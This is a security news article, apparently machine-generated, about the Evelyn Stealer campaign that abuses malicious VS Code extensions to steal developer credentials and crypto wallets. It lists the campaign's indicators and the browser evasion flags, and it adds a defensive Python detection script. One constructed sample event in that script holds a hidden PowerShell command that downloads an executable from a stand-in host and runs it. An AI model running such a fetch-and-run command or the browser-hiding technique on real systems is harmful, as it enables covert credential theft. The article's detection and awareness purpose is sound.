

Ethical Hacking News

The Evelyn Stealer Malware: A New Threat to Developer Security


Evelyn Stealer is an information stealer delivered through malicious Visual Studio Code extensions; it targets software developers and exfiltrates credentials and cryptocurrency-related data from their machines.

  • The Evelyn Stealer malware campaign targets software developers using the Microsoft Visual Studio Code (VS Code) extension ecosystem.
  • The malware exfiltrates sensitive information, including developer credentials and cryptocurrency-related data, from compromised developer environments.
  • The initial vector involved three VS Code extensions, which led to the deployment of a malicious downloader DLL called "Lightshot.dll."
  • The malware injects a main stealer payload into a legitimate Windows process called "grpconv.exe" and harvests sensitive data.
  • The malware collects clipboard content, installed apps, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, system information, and browser credentials.
  • The malware implements safeguards to detect analysis and virtual environments, and it terminates running browsers before relaunching them headlessly with command-line flags chosen to keep the session invisible and to limit forensic traces.
  • The emergence of Evelyn Stealer highlights the growing popularity of information stealers among attackers.
  • Organizations should remain vigilant and take proactive steps to protect their users' sensitive information in light of this new threat.



    Researchers at Trend Micro have documented a new malware campaign, dubbed "Evelyn Stealer," that specifically targets software developers who rely on the Microsoft Visual Studio Code (VS Code) extension ecosystem.

    According to Trend Micro, Evelyn Stealer exfiltrates sensitive information from compromised developer environments, including developer credentials and cryptocurrency-related data. Stolen developer credentials are particularly concerning because they can give attackers a foothold in broader organizational systems such as production environments and cloud resources.

    The initial vector was three VS Code extensions - BigBlack.bitcoin-black, BigBlack.codo-ai, and BigBlack.mrbigblacktheme - each of which led to the deployment of a malicious downloader DLL, "Lightshot.dll." The DLL launched a hidden PowerShell command that fetched and executed a second-stage payload, "runtime.exe."

    That executable decrypts the main stealer payload and injects it directly in memory into "grpconv.exe," a legitimate Windows binary, so that the stealer runs under the name of a trusted process. From there it harvests data and exfiltrates it as a ZIP archive over FTP to a remote server, "server09.mentality[.]cloud."

    Some of the information that was collected by the Evelyn Stealer malware included clipboard content, installed apps, cryptocurrency wallets, running processes, desktop screenshots, stored Wi-Fi credentials, system information, credentials and stored cookies from Google Chrome and Microsoft Edge.

    The malware also implements safeguards to detect analysis and virtual environments. To keep the credential and cookie collection from being disturbed or noticed, it terminates the user's running browser processes and then relaunches the browsers itself with a set of command-line flags that keep the new instance off-screen, suppress logging and avoid interactive prompts, minimizing the forensic traces the session leaves behind.

    These flags included:

    --headless=new, to run in headless mode
    --disable-gpu, to prevent GPU acceleration
    --no-sandbox, to disable browser security sandbox
    --disable-extensions, to prevent legitimate security extensions from interfering
    --disable-logging, to disable browser log generation
    --silent-launch, to suppress startup notifications
    --no-first-run, to bypass initial setup dialogs
    --disable-popup-blocking, so popup blocking cannot interrupt the automated session
    --window-position=-10000,-10000, to position the window off-screen
    --window-size=1,1, to minimize window to 1x1 pixel
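The execution chain above (VS Code extension, hidden PowerShell, runtime.exe, injection into grpconv.exe, FTP exfiltration) and the headless browser relaunch are all observable in endpoint telemetry. The following hunting script is an added example written for this page, not code from Trend Micro or from the campaign; it runs a handful of detection rules over constructed Sysmon-style process-creation and network events. The event records, file paths, the download URL (example.invalid) and the "parent outside C:\Windows" heuristic for grpconv.exe are assumptions made for the example; the extension IDs, the exfiltration host and the browser flags come from the article.

```python
"""Hunt for the Evelyn Stealer execution chain in Sysmon-style events.

Added example: the events below are constructed for illustration, not
captured telemetry. Indicators (extension IDs, exfiltration host, browser
flags) are taken from the article; paths and the download URL are assumed.
"""
import re
from dataclasses import dataclass

MALICIOUS_EXTENSIONS = {"bigblack.bitcoin-black", "bigblack.codo-ai", "bigblack.mrbigblacktheme"}
EXFIL_HOST = "server09.mentality.cloud"   # written as mentality[.]cloud in the article
BROWSERS = {"chrome.exe", "msedge.exe"}
HIDDEN_WINDOW_FLAGS = ("--window-position=-10000,-10000", "--window-size=1,1")


@dataclass
class Event:
    """Minimal Sysmon-like record: kind is 'process' (EID 1) or 'network' (EID 3)."""
    kind: str
    image: str            # full image path of the acting process
    parent: str = ""      # parent image path (process events only)
    cmdline: str = ""
    dest_host: str = ""   # destination hostname (network events only)
    dest_port: int = 0


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, detail) tuples for events matching the chain."""
    findings = []
    for e in events:
        img, cl = basename(e.image), e.cmdline.lower()
        if e.kind == "process":
            par = basename(e.parent)
            # Stage 1: Lightshot.dll makes VS Code spawn a hidden PowerShell downloader.
            if par == "code.exe" and img in ("powershell.exe", "pwsh.exe") \
                    and re.search(r"-w(?:indowstyle)?\s+hidden", cl):
                findings.append(("vscode_hidden_powershell", e.cmdline))
            # Stage 2: grpconv.exe is a legacy Windows binary. A parent outside
            # C:\Windows is a heuristic (assumption) for use as an injection host.
            if img == "grpconv.exe" and not e.parent.lower().startswith("c:\\windows\\"):
                findings.append(("grpconv_unusual_parent", e.parent))
            # Stage 3: browser relaunched headless with its window pushed off-screen.
            if img in BROWSERS and "--headless=new" in cl \
                    and any(flag in cl for flag in HIDDEN_WINDOW_FLAGS):
                findings.append(("browser_offscreen_headless", e.cmdline))
        elif e.kind == "network":
            host = e.dest_host.lower()
            if host == EXFIL_HOST or host.endswith(".mentality.cloud"):
                findings.append(("exfil_host_contact", f"{img} -> {host}:{e.dest_port}"))
            elif img == "grpconv.exe":
                # grpconv.exe has no legitimate reason to open sockets at all.
                findings.append(("grpconv_network", f"{host}:{e.dest_port}"))
    return findings


def suspicious_extensions(folder_names):
    """Match VS Code extension folders (publisher.name-version) against the IOC list."""
    hits = []
    for name in folder_names:
        m = re.match(r"^(.+?)-\d+\.\d+\.\d+", name)
        ext_id = (m.group(1) if m else name).lower()
        if ext_id in MALICIOUS_EXTENSIONS:
            hits.append(ext_id)
    return hits


# Constructed sample events following the chain described in the article.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
          cmdline='powershell.exe -WindowStyle Hidden -c "iwr http://example.invalid/runtime.exe '
                  '-OutFile $env:TEMP\\runtime.exe; & $env:TEMP\\runtime.exe"'),
    Event("process", r"C:\Windows\System32\grpconv.exe",
          parent=r"C:\Users\dev\AppData\Local\Temp\runtime.exe", cmdline="grpconv.exe"),
    Event("process", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          parent=r"C:\Windows\System32\grpconv.exe",
          cmdline="chrome.exe --headless=new --disable-gpu --no-sandbox "
                  "--window-position=-10000,-10000 --window-size=1,1"),
    Event("network", r"C:\Windows\System32\grpconv.exe",
          dest_host="server09.mentality.cloud", dest_port=21),
    # Benign: interactive PowerShell launched from Explorer should not match.
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe", cmdline="powershell.exe -NoProfile"),
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
    print(suspicious_extensions(["bigblack.bitcoin-black-1.0.3", "ms-python.python-2024.2.1"]))
```

Each rule keys on a relationship the stealer cannot easily avoid (VS Code as the parent of a hidden shell, a legacy system binary with a user-space parent and network activity, a browser started off-screen), rather than on a file hash, so it survives trivial rebuilds of the payload. The extension check is meant to run over the folder names under the user's VS Code extensions directory.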

    The campaign shows that attacks against software developers, whose machines hold credentials for the systems they build and deploy, have become an operational target rather than a theoretical one.

    Trend Micro noted that Evelyn Stealer is one example of a broader trend in which information stealers - malware built specifically to exfiltrate sensitive user data - continue to gain traction among attackers.

    Researchers caution that organizations whose developers have access to production systems, cloud resources or digital assets should treat developer workstations as high-value targets: review installed VS Code extensions against the indicators above, watch for the process chain described here, and be ready to rotate credentials stored on any affected machine.

    Evelyn Stealer is a reminder that the developer toolchain, including editor extension marketplaces, is part of the software supply chain and deserves the same scrutiny as package dependencies. Staying informed about emerging campaigns and monitoring for their indicators gives developers and organizations the chance to contain a compromise before stolen credentials are used against broader systems.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Evelyn-Stealer-Malware-A-New-Threat-to-Developer-Security-ehn.shtml

  • https://thehackernews.com/2026/01/evelyn-stealer-malware-abuses-vs-code.html


  • Published: Tue Jan 20 07:32:21 2026 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.